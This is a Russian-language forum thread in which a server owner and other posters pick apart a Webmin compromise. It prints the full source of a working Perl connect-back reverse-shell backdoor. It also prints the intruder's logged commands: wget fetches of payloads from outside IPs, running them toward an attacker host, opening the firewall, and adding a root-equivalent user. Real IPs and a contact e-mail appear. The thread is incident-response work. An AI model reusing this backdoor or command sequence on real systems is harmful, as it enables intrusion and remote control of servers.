изучая остатки fs поломанного сервера...

wget 212.203.29.12/.../cdc.pl

#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}

и ещё: засветилось 2 ip-адреса 63.239.43.8 и 205.214.211.50

Вывод нехрен держать кривые поделки у себя на севаке;)

Ну чтож, бывает.. ;-)

>> хотя прошло уже полтора месяца со взлома:)

А какие действия были после взлома ?

> нахожу интересный лог - файл /etc/webmin/shell/previous.admin

забавно...

ему было неудобно вводить команды через webmin, поэтому он закачал свой бэкдор, запустил, попробовал подключиться, не получилось, начал проверять, запустилось ли все, прибайндился ли порт, все выглядело нормально, но подключиться не удалось, поэтому он решил, что у тебя iptables не разрешают соединения. судя по тому, что после этого лог кончился, после последней команды iptables ему удалось подключиться. 212.72.128.0/24 - это или его сетка, или он там держит/держал proxy/vpn. Может быть, на боте.

Странно, правда, что он не указал полностью ip, а указал подсетку. Хотя, тут у меня есть одно размышление.

А что там, в /usr/lib/mem ? Нашлись history его бэкдорного шела?

> Странно, правда, что он не указал полностью ip, а указал подсетку. Хотя, тут у меня есть одно размышление.

Модем? :)

а webmin по кой высовывать ??? если команды исполнялись из под админа ... значит либо дырка либо пароль знали ...

> Модем? :)

если посмотреть в whois, какой компании принадлежит этот диапазон, а потом зайти на ее сайт (http://www.sanet.ge), то видно, что это провайдер ADSL.

То, что взломщик исправил iptables на всю подсеть, а не на свой текущий адрес, может говорить о двух вещах: или он не знает свой текущий ip (например, потому, что ходит через NAT, а проверить ему было лень), или он рассчитывал придти еще раз позже. Второе мне кажется более логичным, раз он оставил бэкдор.

Возникает вопрос - реальный ли это ip взломщика, или нет. Возможен вариант, что в Грузии живет какой-то несчастный с непропатченной виндой, которую поломали и поставили на нее прокси, или взломщик таки ленив и засветил свой реальный ip.

правда, странно, что скрипт коннектится на один ip, а iptables он правит для другого...

ещё вот интересное: /var/webmin/webmin.log, интерсная его часть


1140505299.19261.0 [21/Фев/2006 10:01:39] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "run" "-" "-" cmd='ps ax'
1140505313.19291.0 [21/Фев/2006 10:01:53] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "run" "-" "-" cmd='which php'
1140505330.19262.0 [21/Фев/2006 10:02:10] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "run" "-" "-" cmd='ifconfig'
1140505397.19359.0 [21/Фев/2006 10:03:17] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "run" "-" "-" cmd='perl cb.pl 212.203.29.12 100'
1140505412.19364.0 [21/Фев/2006 10:03:32] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "run" "-" "-" cmd='iptables -L'
1140505522.19369.0 [21/Фев/2006 10:05:22] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "run" "-" "-" cmd='iptables -I INPUT 1 -j ACCEPT'
1140505614.19379.0 [21/Фев/2006 10:06:54] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "run" "-" "-" cmd='iptables -A INPUT -j ACCEPT'
1140505637.19396.0 [21/Фев/2006 10:07:17] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "run" "-" "-" cmd='iptables -I OUTPUT -j ACCEPT'
1140505755.19515.0 [21/Фев/2006 10:09:15] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "run" "-" "-" cmd='useradd scp'
1140505781.19520.0 [21/Фев/2006 10:09:41] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "run" "-" "-" cmd='usermod -u0 -o scp'
1140505800.19525.0 [21/Фев/2006 10:10:00] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "run" "-" "-" cmd='echo new0n3 | passwd --stdin scp'
1140505825.19532.0 [21/Фев/2006 10:10:25] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "run" "-" "-" cmd='cat /etc/passwd'
1140505862.19537.0 [21/Фев/2006 10:11:02] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "run" "-" "-" cmd='echo new0n3 passwd scp'
1140505872.19542.0 [21/Фев/2006 10:11:12] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "run" "-" "-" cmd='passwd scp'
1140505975.19553.0 [21/Фев/2006 10:12:55] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "run" "-" "-" cmd='userdel scp'
1140505981.19558.0 [21/Фев/2006 10:13:01] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "clear" "-" "-"
1140509282.19354.0 [21/Фев/2006 11:08:02] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "run" "-" "-" cmd='wget 212.184.15.154/cb.pl'
1140509470.19374.0 [21/Фев/2006 11:11:10] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "run" "-" "-" cmd='wget 212.184.15.154/cb.pl'
1140509581.19425.0 [21/Фев/2006 11:13:01] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "run" "-" "-" cmd='wget 212.184.15.154/cb.pl'
1141379286.4353.0 [03/Мар/2006 12:48:06] admin 8a6b90bbee372d0c95af3fcd5e0814ba 205.214.211.50 shell index.cgi "run" "-" "-" cmd='wget 212.203.29.12/.../cdc.pl'
1141379329.4364.0 [03/Мар/2006 12:48:49] admin 8a6b90bbee372d0c95af3fcd5e0814ba 205.214.211.50 shell index.cgi "run" "-" "-" cmd='perl cdc.pl 212.203.29.12 99'
1141430105.10278.0 [04/Мар/2006 02:55:05] admin 8a6b90bbee372d0c95af3fcd5e0814ba 205.214.211.50 shell index.cgi "run" "-" "-" cmd='w'
1141430139.10300.0 [04/Мар/2006 02:55:39] admin 8a6b90bbee372d0c95af3fcd5e0814ba 205.214.211.50 shell index.cgi "run" "-" "-" cmd='last -a'
1141430170.10314.0 [04/Мар/2006 02:56:10] admin 8a6b90bbee372d0c95af3fcd5e0814ba 205.214.211.50 shell index.cgi "run" "-" "-" cmd='netstat -lpn'
1141430427.10340.0 [04/Мар/2006 03:00:27] admin 8a6b90bbee372d0c95af3fcd5e0814ba 205.214.211.50 shell index.cgi "run" "-" "-" cmd='iptables -L'
1141430853.10500.0 [04/Мар/2006 03:07:33] admin 8a6b90bbee372d0c95af3fcd5e0814ba 205.214.211.50 shell index.cgi "run" "-" "-" cmd='ls -al /var/www/htdocs'
1141431142.10620.0 [04/Мар/2006 03:12:22] admin 8a6b90bbee372d0c95af3fcd5e0814ba 205.214.211.50 shell index.cgi "run" "-" "-" cmd='cat /root/.bash_history'
1141432642.11241.0 [04/Мар/2006 03:37:22] admin 8a6b90bbee372d0c95af3fcd5e0814ba 205.214.211.50 shell index.cgi "run" "-" "-" cmd='cd /usr/lib/mem'
1141433611.11526.0 [04/Мар/2006 03:53:31] admin 8a6b90bbee372d0c95af3fcd5e0814ba 205.214.211.50 shell index.cgi "run" "-" "-" cmd='cat note'
1141433812.11674.0 [04/Мар/2006 03:56:52] admin 8a6b90bbee372d0c95af3fcd5e0814ba 205.214.211.50 shell index.cgi "run" "-" "-" cmd='iptables -D INPUT 1'
1141434111.11816.0 [04/Мар/2006 04:01:51] admin 8a6b90bbee372d0c95af3fcd5e0814ba 205.214.211.50 shell index.cgi "run" "-" "-" cmd='iptables -I INPUT 1 -s 212.72.128.0/24 -j ACCEPT'
1141467831.24347.0 [04/Мар/2006 13:23:51] admin 8a6b90bbee372d0c95af3fcd5e0814ba 205.214.211.50 shell index.cgi "run" "-" "-" cmd='w'
1141467871.24352.0 [04/Мар/2006 13:24:31] admin 8a6b90bbee372d0c95af3fcd5e0814ba 205.214.211.50 shell index.cgi "run" "-" "-" cmd='iptables -I INPUT 1 -s 212.72.128.0/24 -j ACCEPT'

я вот всё не могу найти руткит, неужели товарищ его потёр? очень жаль будет....

2ivlad: /usr/lib/mem не сохранилась :(

>А какие действия были после взлома ?

вытаскивание сетевого кабеля сразу после обнаружения двух пустых строчек в ps -ax, т.е. примерно через 2 недели после взлома

основная цель взлома была либо в рассылке спама, либо, что вероятнее, использование моего апача для своих нужд. По крайней мере в htdocs я нашёл две чужие папки, назывались personal и online, содержащие одно и то же (на первый взгляд), могу закинуть куда-нибудь их архивчик

> 1140505397.19359.0 [21/Фев/2006 10:03:17] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "run" "-" "-" cmd='perl cb.pl 212.203.29.12 100'

а где он cb.pl взял? там выше есть?

> 1140505800.19525.0 [21/Фев/2006 10:10:00] admin c2fa33701986a84635818c3b09fbbfb8 63.239.43.8 shell index.cgi "run" "-" "-" cmd='echo new0n3 | passwd --stdin scp'

он создал пользователя, но passwd у тебя не понимает --stdin ? еще несколько вялых попыток и пользователь удален.

> 1141379286.4353.0 [03/Мар/2006 12:48:06] admin 8a6b90bbee372d0c95af3fcd5e0814ba 205.214.211.50 shell index.cgi "run" "-" "-" cmd='wget 212.203.29.12/.../cdc.pl'

я бы связался с

person: Andre van Leeuwen e-mail: andre@corp.home.nl nic-hdl: AVL52-RIPE

и сказал бы ему, что у него на сервере есть занимательный каталог "..." или на abuse@home.nl лучше.

я посмотрел внутрь cb.pl, кстати. оно куда интереснее cdc.pl. в общем, у меня ощущение, что это скрипт-кид, первый бэкдор у него не заработал (уж не знаю, почему), он не стал разбираться, качнул второй.

Заработал второй, или нет, непонятно. Он просто запускал /bin/sh, так что может остаться хистори. Ищи.

Кстати, http://www.webmin.com/security.html ты читал?

> По крайней мере в htdocs я нашёл две чужие папки, назывались personal и online, содержащие одно и то же (на первый взгляд), могу закинуть куда-нибудь их архивчик

давай. только, надеюсь, ты догадался, MAC times там не менять?

Логи апача, кто обращался к этим каталогам, тоже давай.

fs какая на /usr? можно попробовать восстановить каталог, если он вообще был.